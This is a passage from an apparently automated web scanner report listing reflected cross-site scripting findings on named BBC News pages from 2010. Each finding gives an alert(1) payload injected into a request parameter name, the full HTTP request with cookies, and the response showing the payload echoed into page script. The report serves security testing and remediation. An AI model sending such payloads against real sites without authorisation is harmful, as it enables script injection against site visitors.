<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527699000,
       editionToServe: 'us',
       queryString: 'f5e0c'-alert(1)-'933bcd19de9=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007016',
       assetType: 'story',
       
...[SNIP]...

2.65. http://www.bbc.co.uk/news/business-12008023 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12008023

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8f44'-alert(1)-'e979bcc7986 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12008023?b8f44'-alert(1)-'e979bcc7986=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:15 GMT
Keep-Alive: timeout=10, max=556
Expires: Thu, 16 Dec 2010 19:28:15 GMT
Connection: close
Content-Length: 72793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527695000,
       editionToServe: 'us',
       queryString: 'b8f44'-alert(1)-'e979bcc7986=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008023',
       assetType: 'story',
       
...[SNIP]...

2.66. http://www.bbc.co.uk/news/business-12013062 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12013062

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16118'-alert(1)-'cfd5c3262fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12013062?16118'-alert(1)-'cfd5c3262fb=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:21 GMT
Keep-Alive: timeout=10, max=571
Expires: Thu, 16 Dec 2010 19:28:21 GMT
Connection: close
Content-Length: 64903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527701000,
       editionToServe: 'us',
       queryString: '16118'-alert(1)-'cfd5c3262fb=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013062',
       assetType: 'story',
       
...[SNIP]...

2.67. http://www.bbc.co.uk/news/business/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 232e8'-alert(1)-'3e4bb8e793f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business/?232e8'-alert(1)-'3e4bb8e793f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:43:37 GMT
Keep-Alive: timeout=10, max=747
Expires: Thu, 16 Dec 2010 19:43:37 GMT
Connection: close
Content-Length: 73879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528617000,
       editionToServe: 'us',
       queryString: '232e8'-alert(1)-'3e4bb8e793f=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10059368',
       assetType: 'index',
       
...[SNIP]...

2.68. http://www.bbc.co.uk/news/entertainment-arts-12006516 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12006516

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40d49'-alert(1)-'6a70474c933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12006516?40d49'-alert(1)-'6a70474c933=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:05 GMT
Keep-Alive: timeout=10, max=785
Expires: Thu, 16 Dec 2010 19:28:05 GMT
Connection: close
Content-Length: 54046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527685000,
       editionToServe: 'us',
       queryString: '40d49'-alert(1)-'6a70474c933=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006516'
...[SNIP]...

2.69. http://www.bbc.co.uk/news/entertainment-arts-12008225 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12008225

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23295'-alert(1)-'7169313414f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12008225?23295'-alert(1)-'7169313414f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:03 GMT
Keep-Alive: timeout=10, max=516
Expires: Thu, 16 Dec 2010 19:28:03 GMT
Connection: close
Content-Length: 56442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527683000,
       editionToServe: 'us',
       queryString: '23295'-alert(1)-'7169313414f=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008225'
...[SNIP]...

2.70. http://www.bbc.co.uk/news/entertainment-arts-12008226 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12008226

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a376'-alert(1)-'5f1c1cb07f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12008226?3a376'-alert(1)-'5f1c1cb07f9=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:56 GMT
Keep-Alive: timeout=10, max=752
Expires: Thu, 16 Dec 2010 19:27:56 GMT
Connection: close
Content-Length: 54902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527676000,
       editionToServe: 'us',
       queryString: '3a376'-alert(1)-'5f1c1cb07f9=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008226'
...[SNIP]...

2.71. http://www.bbc.co.uk/news/science-environment-11932069 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-11932069

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14371'-alert(1)-'9c1c5b5ca1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-11932069?14371'-alert(1)-'9c1c5b5ca1=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:04 GMT
Keep-Alive: timeout=10, max=767
Expires: Thu, 16 Dec 2010 19:28:04 GMT
Connection: close
Content-Length: 61647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527684000,
       editionToServe: 'us',
       queryString: '14371'-alert(1)-'9c1c5b5ca1=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1193206
...[SNIP]...

2.72. http://www.bbc.co.uk/news/science-environment-11938904 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-11938904

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffc3f'-alert(1)-'bc7ea7cdbff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-11938904?ffc3f'-alert(1)-'bc7ea7cdbff=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:02 GMT
Keep-Alive: timeout=10, max=751
Expires: Thu, 16 Dec 2010 19:28:02 GMT
Connection: close
Content-Length: 64877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527682000,
       editionToServe: 'us',
       queryString: 'ffc3f'-alert(1)-'bc7ea7cdbff=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1193890
...[SNIP]...

2.73. http://www.bbc.co.uk/news/science-environment-12007965 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12007965

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd7f'-alert(1)-'02cd49c43e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12007965?2dd7f'-alert(1)-'02cd49c43e1=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:02 GMT
Keep-Alive: timeout=10, max=555
Expires: Thu, 16 Dec 2010 19:28:02 GMT
Connection: close
Content-Length: 59630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527682000,
       editionToServe: 'us',
       queryString: '2dd7f'-alert(1)-'02cd49c43e1=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1200796
...[SNIP]...

2.74. http://www.bbc.co.uk/news/science_and_environment/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science_and_environment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d546'-alert(1)-'f8c3281a0a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science_and_environment/?7d546'-alert(1)-'f8c3281a0a1=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:43:53 GMT
Keep-Alive: timeout=10, max=724
Expires: Thu, 16 Dec 2010 19:43:53 GMT
Connection: close
Content-Length: 65531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528633000,
       editionToServe: 'us',
       queryString: '7d546'-alert(1)-'f8c3281a0a1=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1005937
...[SNIP]...

2.75. http://www.bbc.co.uk/news/technology/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65033'-alert(1)-'f119706f282 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology/?65033'-alert(1)-'f119706f282=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:43:53 GMT
Keep-Alive: timeout=10, max=787
Expires: Thu, 16 Dec 2010 19:43:53 GMT
Connection: close
Content-Length: 60095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528633000,
       editionToServe: 'us',
       queryString: '65033'-alert(1)-'f119706f282=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10059376',
       assetType: 'index',
...[SNIP]...

2.76. http://www.bbc.co.uk/news/uk-12005930 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12005930

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0936'-alert(1)-'2ad05f35490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12005930?f0936'-alert(1)-'2ad05f35490=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:36 GMT
Keep-Alive: timeout=10, max=661
Expires: Thu, 16 Dec 2010 19:27:36 GMT
Connection: close
Content-Length: 70960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527656000,
       editionToServe: 'us',
       queryString: 'f0936'-alert(1)-'2ad05f35490=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12005930',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

2.77. http://www.bbc.co.uk/news/uk-12006061 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12006061

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad9d1'-alert(1)-'f2889195cec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12006061?ad9d1'-alert(1)-'f2889195cec=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:58 GMT
Keep-Alive: timeout=10, max=718
Expires: Thu, 16 Dec 2010 19:27:58 GMT
Connection: close
Content-Length: 58471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527678000,
       editionToServe: 'us',
       queryString: 'ad9d1'-alert(1)-'f2889195cec=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006061',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

2.78. http://www.bbc.co.uk/news/uk-12006670 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
